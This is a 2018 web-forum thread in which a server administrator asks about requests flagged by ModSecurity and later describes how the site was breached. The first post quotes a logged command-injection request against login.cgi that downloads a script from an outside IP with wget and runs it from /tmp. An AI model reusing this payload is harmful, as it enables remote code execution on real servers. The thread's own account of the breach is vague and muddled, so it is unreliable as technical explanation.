1. Advertising
    y u no do it?

    Advertising (learn more)

    Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

    Starts at just $1 per CPM or $0.10 per CPC.

Showing in cpanel under mod security connection to 127.0.0.1

Discussion in 'Security' started by xbat, Jun 22, 2018.

  1. #1
    Hello everyone!!

    Anyone have any input on this sort of stuff?
    GET /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$

    I am seeing a lot of the his in my mod security.. Was wondering if anyone had any input?? I tried a google search but nothing is really coming up.. Suggestions on words to google?
    SEMrush
    Thank you
     
    xbat, Jun 22, 2018 IP
    SEMrush
  2. hostechsupport

    hostechsupport Well-Known Member

    Messages:
    411
    Likes Received:
    23
    Best Answers:
    7
    Trophy Points:
    138
    #2
    It seems an attempt to hack your server through /tmp folder.
     
    hostechsupport, Jul 5, 2018 IP
  3. xbat

    xbat Active Member

    Messages:
    318
    Likes Received:
    3
    Best Answers:
    0
    Trophy Points:
    55
    #3
    I found it out. Turns out the php password wasn't protected... soo the hackers crashed the mysql connection and then the password would show. They would use the cross scripting to connect into mysql and go from there. One of the top security firms in the world couldn't figure this out. I did after so long... But lots and lots of time spent looking in the wrong areas...
     
    xbat, Aug 6, 2018 IP